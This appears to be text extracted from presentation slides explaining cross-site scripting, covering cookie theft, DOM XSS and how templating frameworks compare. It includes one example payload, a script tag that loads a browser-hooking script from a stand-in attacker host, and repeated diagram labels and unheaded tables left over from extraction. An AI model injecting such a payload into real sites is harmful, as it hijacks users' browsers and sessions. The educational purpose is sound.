Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
When an attacker gets a user's browser to execute his/her code, the code will
run within the security context (or zone) of the hosting web site. With this level of
privilege, the code has the ability to read, modify and transmit any sensitive data
accessible by the browser. A Cross-site Scripted user could have his/her
account hijacked (cookie theft), their browser redirected to another location, or
possibly shown fraudulent content delivered by the web site they are visiting.
An attacker can use XSS to send a malicious script to an unsuspecting user. The
end users browser has no way to know that the script should not be trusted,
and will execute the script. Because it thinks the script came from a trusted
source, the malicious script can access any cookies, session tokens, or other
sensitive information retained by the browser and used with that site.
PAYMENTS ANALYTICS
MESSAGE QUEUE
SERVICE GATEWAY
CRM CART
FRONTEND
HACKERS USERS
PAYMENTS ANALYTICS
MESSAGE QUEUE
<script src=http://attacker.com/beefhook.js></script>
SERVICE GATEWAY
CRM CART
FRONTEND
HACKERS USERS
PAYMENTS ANALYTICS
MESSAGE QUEUE
SERVICE GATEWAY
CRM CART
FRONTEND
HACKERS USERS
PAYMENTS ANALYTICS
MESSAGE QUEUE
SERVICE GATEWAY
CRM CART
FRONTEND
HACKERS USERS
PAYMENTS ANALYTICS
MESSAGE QUEUE
SERVICE GATEWAY
CRM CART
FRONTEND
HACKERS USERS
PAYMENTS ANALYTICS
MESSAGE QUEUE
SERVICE GATEWAY
CRM CART
FRONTEND
HACKERS USERS
PAYMENTS ANALYTICS
MESSAGE QUEUE
SERVICE GATEWAY
CRM CART
FRONTEND
HACKERS USERS
PAYMENTS ANALYTICS
MESSAGE QUEUE
SERVICE GATEWAY
CRM CART
FRONTEND
HACKERS USERS
PAYMENTS ANALYTICS
MESSAGE QUEUE
SERVICE GATEWAY
CRM CART
FRONTEND
HACKERS USERS
APIs everywhere
DOM XSS - a form of XSS where the entire tainted data flow from
source to sink takes place in the browser.
JavaEE N N N N N N
Thymeleaf Y Y N N N N
ERB Y Y N N N N
Razor Y Y N Y Y N
AngularJS Y Y Y Y Y N
ReactJS Y Y Y Y Y N
GO Template Y Y Y Y Y Y
Affected by scale
Affected by complexity
View
UserPortal N N N N N N
Administration Y Y N N N N
Data Import Y Y N N N N
Y Y N Y Y N
Y Y Y Y Y N
Y Y Y Y Y N
Y Y Y Y Y Y
https://www.whitehatsec.com/blog/